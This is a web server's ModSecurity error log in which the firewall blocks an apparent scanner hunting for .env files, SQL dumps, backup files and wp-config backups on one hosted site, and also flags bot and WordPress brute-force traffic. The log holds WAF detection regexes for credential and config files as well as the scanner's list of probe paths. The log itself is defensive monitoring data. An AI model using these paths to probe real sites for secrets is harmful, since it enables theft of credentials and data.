[Tue May 26 19:50:15.797461 2026] [security2:error] [pid 86490:tid 86636] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/nats/.env"] [unique_id "ahWsH1ZMwN0DpLVWo6KLjwAAAJU"]
[Tue May 26 19:50:15.869943 2026] [autoindex:error] [pid 86490:tid 86736] [client 91.142.73.116:62056] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://newdental.com.co/
[Tue May 26 19:50:16.038912 2026] [security2:error] [pid 86490:tid 86640] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWsIFZMwN0DpLVWo6KLlwAAAJk"]
[Tue May 26 19:50:16.039445 2026] [security2:error] [pid 86490:tid 86654] [client 35.175.92.196:53138] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWsIFZMwN0DpLVWo6KLlQAAAKc"]
[Tue May 26 19:50:16.131713 2026] [security2:error] [pid 86490:tid 86705] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsHlZMwN0DpLVWo6KLZwAAANo"]
[Tue May 26 19:50:16.131771 2026] [security2:error] [pid 86490:tid 86705] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsHlZMwN0DpLVWo6KLZwAAANo"]
[Tue May 26 19:50:16.132278 2026] [security2:error] [pid 86490:tid 86680] [client 65.109.156.37:51234] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/blog-2/blog-boxed-column/"] [unique_id "ahWsHlZMwN0DpLVWo6KLZQAAAME"]
[Tue May 26 19:50:16.241822 2026] [security2:error] [pid 86490:tid 86678] [client 35.175.92.196:41968] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWsIFZMwN0DpLVWo6KLoQAAAL8"]
[Tue May 26 19:50:16.443723 2026] [security2:error] [pid 86490:tid 86639] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/rewards/.env"] [unique_id "ahWsIFZMwN0DpLVWo6KLrgAAAJg"]
[Tue May 26 19:50:16.680855 2026] [autoindex:error] [pid 86490:tid 86731] [client 91.142.73.116:55985] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://newdental.com.co/
[Tue May 26 19:50:16.751438 2026] [security2:error] [pid 86490:tid 86697] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsIFZMwN0DpLVWo6KLugAAANI"]
[Tue May 26 19:50:16.751465 2026] [security2:error] [pid 86490:tid 86697] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsIFZMwN0DpLVWo6KLugAAANI"]
[Tue May 26 19:50:16.751893 2026] [security2:error] [pid 86490:tid 86653] [client 65.109.156.37:52095] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/blog-2/blog-boxed-column/"] [unique_id "ahWsIFZMwN0DpLVWo6KLuAAAAKY"]
[Tue May 26 19:50:16.765156 2026] [security2:error] [pid 86490:tid 86694] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/login-app/client/.env"] [unique_id "ahWsIFZMwN0DpLVWo6KLxwAAAM8"]
[Tue May 26 19:50:17.090986 2026] [security2:error] [pid 86490:tid 86654] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/install.sql"] [unique_id "ahWsIVZMwN0DpLVWo6KL0gAAAKc"]
[Tue May 26 19:50:17.216539 2026] [security2:error] [pid 86490:tid 86614] [remote 101.100.249.238:42434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.249.100.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWsIVZMwN0DpLVWo6KL0wAAq3s"], referer: https://jhonweb.com/wp-login.php
[Tue May 26 19:50:17.251367 2026] [security2:error] [pid 86490:tid 86689] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/db/index.bak"] [unique_id "ahWsIVZMwN0DpLVWo6KL1wAAAMo"]
[Tue May 26 19:50:17.410947 2026] [security2:error] [pid 86490:tid 86743] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/frontend/vue/.env"] [unique_id "ahWsIVZMwN0DpLVWo6KL5AAAAQA"]
[Tue May 26 19:50:18.059944 2026] [security2:error] [pid 86490:tid 86697] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fitness-app/api/.env"] [unique_id "ahWsIlZMwN0DpLVWo6KL-wAAANI"]
[Tue May 26 19:50:18.065051 2026] [security2:error] [pid 86490:tid 86622] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsIVZMwN0DpLVWo6KL6gAAAIc"]
[Tue May 26 19:50:18.749005 2026] [security2:error] [pid 86490:tid 86607] [remote 162.214.184.71:42088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWsIlZMwN0DpLVWo6KMFAAArnQ"]
[Tue May 26 19:50:19.030089 2026] [security2:error] [pid 86490:tid 86668] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/grems-frontend/.env"] [unique_id "ahWsI1ZMwN0DpLVWo6KMIwAAALU"]
[Tue May 26 19:50:19.190137 2026] [security2:error] [pid 86490:tid 86742] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/scripts/fvt/.env"] [unique_id "ahWsI1ZMwN0DpLVWo6KMKgAAAP8"]
[Tue May 26 19:50:19.511978 2026] [security2:error] [pid 86490:tid 86666] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/backup/test.sql"] [unique_id "ahWsI1ZMwN0DpLVWo6KMOwAAALM"]
[Tue May 26 19:50:19.833317 2026] [security2:error] [pid 86490:tid 86684] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/experiments/.env"] [unique_id "ahWsI1ZMwN0DpLVWo6KMSgAAAMU"]
[Tue May 26 19:50:20.033208 2026] [security2:error] [pid 86490:tid 86637] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsI1ZMwN0DpLVWo6KMPwAAAJY"]
[Tue May 26 19:50:20.156640 2026] [security2:error] [pid 86490:tid 86683] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mobile-app/.env"] [unique_id "ahWsJFZMwN0DpLVWo6KMVQAAAMQ"]
[Tue May 26 19:50:21.126739 2026] [security2:error] [pid 86490:tid 86704] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nightly/.env"] [unique_id "ahWsJVZMwN0DpLVWo6KMggAAANk"]
[Tue May 26 19:50:21.166634 2026] [security2:error] [pid 86490:tid 86680] [client 85.208.96.204:45322] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWsJVZMwN0DpLVWo6KMgwAAAME"]
[Tue May 26 19:50:21.166781 2026] [security2:error] [pid 86490:tid 86680] [client 85.208.96.204:45322] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWsJVZMwN0DpLVWo6KMgwAAAME"]
[Tue May 26 19:50:21.610406 2026] [security2:error] [pid 86490:tid 86683] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/db_backup.bak"] [unique_id "ahWsJVZMwN0DpLVWo6KMlgAAAMQ"]
[Tue May 26 19:50:22.770957 2026] [security2:error] [pid 86490:tid 86657] [client 114.119.131.93:28213] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneouseada/cafadc1928956.shtml"] [unique_id "ahWsJlZMwN0DpLVWo6KMuQAAAKo"], referer: http://ghanemgh.com/prespontaneouseada/cafadc1928956.shtml
[Tue May 26 19:50:22.876228 2026] [security2:error] [pid 86490:tid 86501] [remote 162.214.184.71:42088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWsJlZMwN0DpLVWo6KMwAAApAo"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:50:22.902671 2026] [security2:error] [pid 86490:tid 86641] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/site/backup.sql"] [unique_id "ahWsJlZMwN0DpLVWo6KMwQAAAJo"]
[Tue May 26 19:50:23.142814 2026] [security2:error] [pid 86490:tid 86685] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsJlZMwN0DpLVWo6KMtwAAAMY"]
[Tue May 26 19:50:23.387699 2026] [security2:error] [pid 86490:tid 86746] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/backup/users.sql"] [unique_id "ahWsJ1ZMwN0DpLVWo6KMygAAAQM"]
[Tue May 26 19:50:23.709887 2026] [security2:error] [pid 86490:tid 86713] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/drush/drush.orig"] [unique_id "ahWsJ1ZMwN0DpLVWo6KM2AAAAOI"]
[Tue May 26 19:50:24.517491 2026] [security2:error] [pid 86490:tid 86676] [client 74.7.244.56:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.triviewsolutions.com.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWsKFZMwN0DpLVWo6KM7QAAAL0"]
[Tue May 26 19:50:24.517561 2026] [security2:error] [pid 86490:tid 86689] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mailer.properties.bak"] [unique_id "ahWsKFZMwN0DpLVWo6KNBgAAAMo"]
[Tue May 26 19:50:24.518304 2026] [security2:error] [pid 86490:tid 86708] [client 74.7.244.56:34506] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.triviewsolutions.com.freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahWsKFZMwN0DpLVWo6KM6wAA3RE"]
[Tue May 26 19:50:24.590128 2026] [security2:error] [pid 86490:tid 86731] [client 74.7.175.156:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.triviewsolutions.com"] [uri "/index.php"] [unique_id "ahWsKFZMwN0DpLVWo6KM9gAAAPQ"]
[Tue May 26 19:50:24.590163 2026] [security2:error] [pid 86490:tid 86731] [client 74.7.175.156:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.triviewsolutions.com"] [uri "/index.php"] [unique_id "ahWsKFZMwN0DpLVWo6KM9gAAAPQ"]
[Tue May 26 19:50:24.596734 2026] [security2:error] [pid 86490:tid 86686] [client 74.7.175.156:44552] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.triviewsolutions.com"] [uri "/robots.txt"] [unique_id "ahWsKFZMwN0DpLVWo6KM9AAAxxI"]
[Tue May 26 19:50:24.844081 2026] [security2:error] [pid 86490:tid 86700] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/keys/wp-config.bak"] [unique_id "ahWsKFZMwN0DpLVWo6KNEQAAANU"]
[Tue May 26 19:50:25.165421 2026] [security2:error] [pid 86490:tid 86648] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dotnet-app/server/.env"] [unique_id "ahWsKVZMwN0DpLVWo6KNIAAAAKE"]
[Tue May 26 19:50:25.318511 2026] [security2:error] [pid 86490:tid 86682] [client 74.7.175.156:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "triviewsolutions.com"] [uri "/index.php"] [unique_id "ahWsKFZMwN0DpLVWo6KNEAAAAMM"], referer: https://www.triviewsolutions.com/robots.txt
[Tue May 26 19:50:25.319327 2026] [security2:error] [pid 86490:tid 86668] [client 74.7.175.156:44564] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "triviewsolutions.com"] [uri "/robots.txt"] [unique_id "ahWsKFZMwN0DpLVWo6KNDgAAtX4"], referer: https://www.triviewsolutions.com/robots.txt
[Tue May 26 19:50:25.649165 2026] [security2:error] [pid 86490:tid 86657] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/clld_dir/.env"] [unique_id "ahWsKVZMwN0DpLVWo6KNLwAAAKo"]
[Tue May 26 19:50:25.802285 2026] [security2:error] [pid 86490:tid 86706] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsKVZMwN0DpLVWo6KNLQAAANs"]
[Tue May 26 19:50:25.971098 2026] [security2:error] [pid 86490:tid 86677] [client 185.177.72.53:21166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/unity/.env"] [unique_id "ahWsKVZMwN0DpLVWo6KNPwAAAL4"]
[Tue May 26 19:50:26.280770 2026] [security2:error] [pid 86490:tid 86517] [remote 173.236.215.92:56352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.215.236.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWsKlZMwN0DpLVWo6KNRAAAuRo"]
